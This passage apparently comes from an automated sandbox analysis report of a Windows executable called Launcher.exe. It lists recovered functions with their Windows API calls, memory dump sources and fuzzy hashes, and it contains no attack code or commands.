                                                                        • Opcode Fuzzy Hash: 09ae086a67c02cb642978d3b601628b29419bccc41fa4b248cee0ea593942d04
                                                                        • Instruction Fuzzy Hash: 2831E37491122DABCB25DF28D889B8DBBB8BF08310F5041EAE41CA7251EB749F958F45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bz
                                                                        • API String ID: 0-1364901316
                                                                        • Opcode ID: 3181cba82fe51e371b6e2665e700cc246e893efb932c58e38e20f6eda0be743f
                                                                        • Instruction ID: 9aef04edb884cebf8f8b90b94cd5b18609298c9e73b81024620c1a916d2d5c99
                                                                        • Opcode Fuzzy Hash: 3181cba82fe51e371b6e2665e700cc246e893efb932c58e38e20f6eda0be743f
                                                                        • Instruction Fuzzy Hash: 69F27C66A556D84FEF024AB884B93DF6FF14B2B330F6A2795C5E46F2D3C507010A9B60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: o\L
                                                                        • API String ID: 0-3684436971
                                                                        • Opcode ID: af3e6e1920af11e58466661bbd8b7f5d9d1439846c08e17748811614577f0a20
                                                                        • Instruction ID: b8ed9a23bb0da359af94b8f1cf53e37bba53b4f6c0b4861fc8b0d2a4a5d0cffb
                                                                        • Opcode Fuzzy Hash: af3e6e1920af11e58466661bbd8b7f5d9d1439846c08e17748811614577f0a20
                                                                        • Instruction Fuzzy Hash: E3E2ED72E606944FEF014A7CC8B93DB6FE28B67331F2A279586B85F6D2C517010A9F40
                                                                        APIs
                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00256F4D,?,?,00000008,?,?,00256B1F,00000000), ref: 0025721F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionRaise
                                                                        • String ID:
                                                                        • API String ID: 3997070919-0
                                                                        • Opcode ID: 3ad56efcbefbbc15fdc85473805c19e3b4646c6d653349cc312772a431238d87
                                                                        • Instruction ID: b51262cb2c0a28fc8bbf75c0faa68af09f01f07e2104d8604a6f17e46cf82808
                                                                        • Opcode Fuzzy Hash: 3ad56efcbefbbc15fdc85473805c19e3b4646c6d653349cc312772a431238d87
                                                                        • Instruction Fuzzy Hash: DCB18C311246099FD718CF28D48AB647BE1FF05366F29C658EC99CF2A1C335E9A6CB44
                                                                        APIs
                                                                          • Part of subcall function 00250827: HeapAlloc.KERNEL32(00000008,?,?,?,0024F077,00000001,00000364,?,00000006,000000FF,?,0024BE45,0025ED20,0000000C), ref: 00250868
                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002518EB
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 002519DF
                                                                        • FindClose.KERNEL32(00000000), ref: 00251A1E
                                                                        • FindClose.KERNEL32(00000000), ref: 00251A51
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                        • String ID:
                                                                        • API String ID: 2701053895-0
                                                                        • Opcode ID: 359c81166eac34ca610694828a250f89bbfee98514796215e668244280fe694b
                                                                        • Instruction ID: 87824f5d67301ceb156f93d3b198f1ede40dd23b1004c070741ed69595e7c6d3
                                                                        • Opcode Fuzzy Hash: 359c81166eac34ca610694828a250f89bbfee98514796215e668244280fe694b
                                                                        • Instruction Fuzzy Hash: FB517871910119AFDB24AF3C9C89BBEB7A9DF49305F144199FC1997201EB308DB98F68
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0024A236
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: FeaturePresentProcessor
                                                                        • String ID:
                                                                        • API String ID: 2325560087-0
                                                                        • Opcode ID: ae9764407804dfe65b35ad39d7ac936dabde00564b09492edc51e5aaa4cfb033
                                                                        • Instruction ID: bfb5a7130ffb7428ec8bc74e2c4397b15a668782ac8fc40ee1846da16a17be83
                                                                        • Opcode Fuzzy Hash: ae9764407804dfe65b35ad39d7ac936dabde00564b09492edc51e5aaa4cfb033
                                                                        • Instruction Fuzzy Hash: EE518EB192120A8FEB18CF58E8C57AABBF4FB44310F24C46AD401EB250E3B5AD60DF51
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001A580), ref: 0024A45D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: dcd4da236bf202a1b5ba59212af5d8fec7a24ec9d76f26cb0b3bf8c92f967323
                                                                        • Instruction ID: 66b7dfa34439bfd63f02696a1b538e7a582550a368ff7b4ff0075bd8cf095ff1
                                                                        • Opcode Fuzzy Hash: dcd4da236bf202a1b5ba59212af5d8fec7a24ec9d76f26cb0b3bf8c92f967323
                                                                        • Instruction Fuzzy Hash:
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: HeapProcess
                                                                        • String ID:
                                                                        • API String ID: 54951025-0
                                                                        • Opcode ID: 00416735ebcf3dd5a84d2d75883ddddcdf9f345ece5d470c8b65780c641ddab6
                                                                        • Instruction ID: f2c2a4c729ff86ee8c29825392cf563d1cbe485670ce77afdf9e177f4b372e8c
                                                                        • Opcode Fuzzy Hash: 00416735ebcf3dd5a84d2d75883ddddcdf9f345ece5d470c8b65780c641ddab6
                                                                        • Instruction Fuzzy Hash: 69A00270A03301CF9B448F37FF0D34E3BE9BA466D270AC0AAE405C56B0EB74A9649B05
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d886f539424a4e2e233bdad8d88b38f8d55dd63490c3fbd534e56d2bfc42fa4
                                                                        • Instruction ID: 483a3eaae91210f2ec2baf656466107309f1a48166a4b8b6e5227145217907d6
                                                                        • Opcode Fuzzy Hash: 0d886f539424a4e2e233bdad8d88b38f8d55dd63490c3fbd534e56d2bfc42fa4
                                                                        • Instruction Fuzzy Hash: DC22CF76AA46845FEF024A78C4A93CF6FF24B6B731F1E2759C9A06F3D2C557000A9B50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0c90ec59d0392991c29b7473d024c14d89b7a695b6536f770b58f902ef5e887f
                                                                        • Instruction ID: 82d16424d634a8d9474bb1adc0a870a40edba8c5d7f8ffa21f91a30c2b69e75b
                                                                        • Opcode Fuzzy Hash: 0c90ec59d0392991c29b7473d024c14d89b7a695b6536f770b58f902ef5e887f
                                                                        • Instruction Fuzzy Hash: C312D276E916844FEF018ABCC4A93DF7FE24B6B331F1A2766C5B46B2D2C557040A8B50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ebbf3e3fc88a754bcb956657df80789eb1b9b6fa97a827e2594d7bec4eebfaf3
                                                                        • Instruction ID: c51d51c447004ad3a5ac0d9f00eb24a3b81b8ddc6d0fecdf59b18b81485c297c
                                                                        • Opcode Fuzzy Hash: ebbf3e3fc88a754bcb956657df80789eb1b9b6fa97a827e2594d7bec4eebfaf3
                                                                        • Instruction Fuzzy Hash: 1012B573E315145B8B08CEBDCC9559EB7F3AFD9334B2A8329A535EB2D4D67498018780
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d2487073f2e690843aa29184d3117aa1763c705603fd817ca9b3f0fa42605070
                                                                        • Instruction ID: cc428e6bbbdb4c533ff832b952a2e6669e43f1a0d1e9ffe2036b922a51e4d76a
                                                                        • Opcode Fuzzy Hash: d2487073f2e690843aa29184d3117aa1763c705603fd817ca9b3f0fa42605070
                                                                        • Instruction Fuzzy Hash: 24122A72E256188BDB14CEBCCC8169DB7F2AF48330F1A8769E579FB2D5D67099008B50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d5f7cd04b33e0a9132e0b3bef6098cbb3b2fb4e5cc80e4e5007cb7799f708fef
                                                                        • Instruction ID: 8abb7fd797eb7fbedd56d21e6f45d29fd48032db54c24519b0956467f1e29944
                                                                        • Opcode Fuzzy Hash: d5f7cd04b33e0a9132e0b3bef6098cbb3b2fb4e5cc80e4e5007cb7799f708fef
                                                                        • Instruction Fuzzy Hash: 1AD0923A645A59AFC310CF49E480D42F7B8FB8D670B158066EA0893B20C371FC11CAE0
                                                                        APIs
                                                                        • type_info::operator==.LIBVCRUNTIME ref: 0024E212
                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 0024E320
                                                                        • CatchIt.LIBVCRUNTIME ref: 0024E371
                                                                        • _UnwindNestedFrames.LIBCMT ref: 0024E472
                                                                        • CallUnexpected.LIBVCRUNTIME ref: 0024E48D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 4119006552-393685449
                                                                        • Opcode ID: 6a64426c22ed22951a9f687519479c98a66b90b246364906340bb17bdcc85ebe
                                                                        • Instruction ID: 4f25a9ba881ee55c50086e0ab4af624d189658037e11b5a1ab2a09bc2ac49722
                                                                        • Opcode Fuzzy Hash: 6a64426c22ed22951a9f687519479c98a66b90b246364906340bb17bdcc85ebe
                                                                        • Instruction Fuzzy Hash: F8B15B71C2021AEFDF1DDFA4C8819AEBBB9FF14310B164199E8156B212D770EA61CF91
                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(02AEEC38,02AEEC38,00000000,7FFFFFFF,?,00255313,02AEEC38,02AEEC38,00000000,02AEEC38,?,?,?,?,02AEEC38,00000000), ref: 002553CE
                                                                        • __alloca_probe_16.LIBCMT ref: 00255489
                                                                        • __alloca_probe_16.LIBCMT ref: 00255518
                                                                        • __freea.LIBCMT ref: 00255563
                                                                        • __freea.LIBCMT ref: 00255569
                                                                        • __freea.LIBCMT ref: 0025559F
                                                                        • __freea.LIBCMT ref: 002555A5
                                                                        • __freea.LIBCMT ref: 002555B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                        • String ID:
                                                                        • API String ID: 127012223-0
                                                                        • Opcode ID: 36a3ec1912e57d3ed3d36c0d5cb3d44f84dacc936d26c500031721c0c965daa4
                                                                        • Instruction ID: 3b3a2d71b746fbbd8d08fb114caf6aae75e32bf127da444333c8fba437cf58f8
                                                                        • Opcode Fuzzy Hash: 36a3ec1912e57d3ed3d36c0d5cb3d44f84dacc936d26c500031721c0c965daa4
                                                                        • Instruction Fuzzy Hash: 8E716A72920A26ABDF219F548CA1FAF77BA9F04313F680015EC05A7241F770DC688B9C
                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 0024B187
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0024B18F
                                                                        • _ValidateLocalCookies.LIBCMT ref: 0024B218
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0024B243
                                                                        • _ValidateLocalCookies.LIBCMT ref: 0024B298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        • Opcode ID: 9ea397c5b22dadf32c931760ea4ba5b3eeb4628c5d5a51706872386a277d9567
                                                                        • Instruction ID: a8d4e8c3af0d4f05676669fb5a35c8aa10af891cb80f6688eb36648ef88d28c6
                                                                        • Opcode Fuzzy Hash: 9ea397c5b22dadf32c931760ea4ba5b3eeb4628c5d5a51706872386a277d9567
                                                                        • Instruction Fuzzy Hash: 0941E634E20219ABCF19DF68C885A9E7BB4FF05324F148455EC19AB392D771EA21CF91
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,0024D851,0024AF2D,0024A5C4), ref: 0024D868
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0024D876
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0024D88F
                                                                        • SetLastError.KERNEL32(00000000,0024D851,0024AF2D,0024A5C4), ref: 0024D8E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: 12fc83a2706fab16b34c4a4de1a8f1b9639708304fa65bb2d59ecf184475ba1b
                                                                        • Instruction ID: 35e8a62abee9f7ada0ed02c6397c25bc9b1f3c77f3b59234ff0a4ec2d3c70c38
                                                                        • Opcode Fuzzy Hash: 12fc83a2706fab16b34c4a4de1a8f1b9639708304fa65bb2d59ecf184475ba1b
                                                                        • Instruction Fuzzy Hash: 6E01753223D7125EE6181F75BCC9A3F2B58DF427B57200229F510550E1EE618C756A84
                                                                        Strings
                                                                        • C:\Users\user\Desktop\Launcher.exe, xrefs: 00251B90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Users\user\Desktop\Launcher.exe
                                                                        • API String ID: 0-2114230883
                                                                        • Opcode ID: d9037501c78a2a2b4f55a72e737f76c0a0115f73dae90b8618e8c7a8233d3c8e
                                                                        • Instruction ID: 0492cafba340c34a7fb40d60e4d9beec81738385dff938eaad650a7068dcce02
                                                                        • Opcode Fuzzy Hash: d9037501c78a2a2b4f55a72e737f76c0a0115f73dae90b8618e8c7a8233d3c8e
                                                                        • Instruction Fuzzy Hash: 8821C07163020AAFCB20AF65DC81E6BB7ADAF0436B7104519FC1597151EB31EC388FA9
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,58D485F2,?,?,00000000,0025760B,000000FF,?,0024C035,00000002,?,0024C0D1,0024D3C0), ref: 0024BFA9
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0024BFBB
